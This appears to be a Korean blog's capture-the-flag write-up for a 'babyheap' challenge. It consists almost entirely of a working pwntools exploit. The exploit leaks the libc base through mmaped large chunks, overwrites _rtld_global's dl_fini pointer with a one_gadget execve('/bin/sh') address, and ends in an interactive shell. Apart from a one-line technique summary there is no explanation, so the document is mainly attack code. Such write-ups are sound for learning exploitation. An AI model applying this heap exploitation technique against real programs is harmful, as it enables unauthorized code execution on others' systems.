malloc mmaped large chunk
leak libc && overwrite _rtld_global + 3840(dl_fini)
shell
from pwn import *
#context.log_level= 'debug'
e = ELF('babyheap')
#s = process(e.path, env={'LD_PRELOAD': './libc.so.6'})
s = process(e.path)
l = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
#l = ELF('libc.so.6', checksec=False)
ru = lambda x: s.recvuntil(x)
sl = lambda x: s.sendline(x)
p = lambda : pause()
io = lambda : s.interactive()
sla = lambda x,y: s.sendlineafter(x,y)
sa = lambda x,y: s.sendafter(x,y)
def malloc(size, data):
sla('> ', '1')
sla('> ', size)
sa('> ', data)
def free(idx):
sla('> ', '2')
sla('> ', idx)
malloc(str(0x30000), p64(0x20))
free(str(0x4bfa0))
malloc(str(0x30000), p64(0x20))
free(str(0x7cfa0))
malloc(str(0x30), '\x60')
l_base = u64(s.recv(8)) - 0x619f60
log.info('l_base: {}'.format(hex(l_base)))
dump = '''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rcx == NULL
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
one_list = [0x4f2c5, 0x4f322, 0x10a38c]
one = l_base + one_list[1]
malloc(str(0x38), p64(one))
malloc(str(0x38), p64(one))
io()'system > writeup' 카테고리의 다른 글
| 2019 d3ctf babyrop (0) | 2019.12.15 |
|---|---|
| 2019 d3ctf ezfile (0) | 2019.12.15 |
| 2018 0ctf final baby (0) | 2019.12.03 |
| 2018 bctf three (0) | 2019.12.01 |
| 2018 bctf houseofatum (0) | 2019.12.01 |
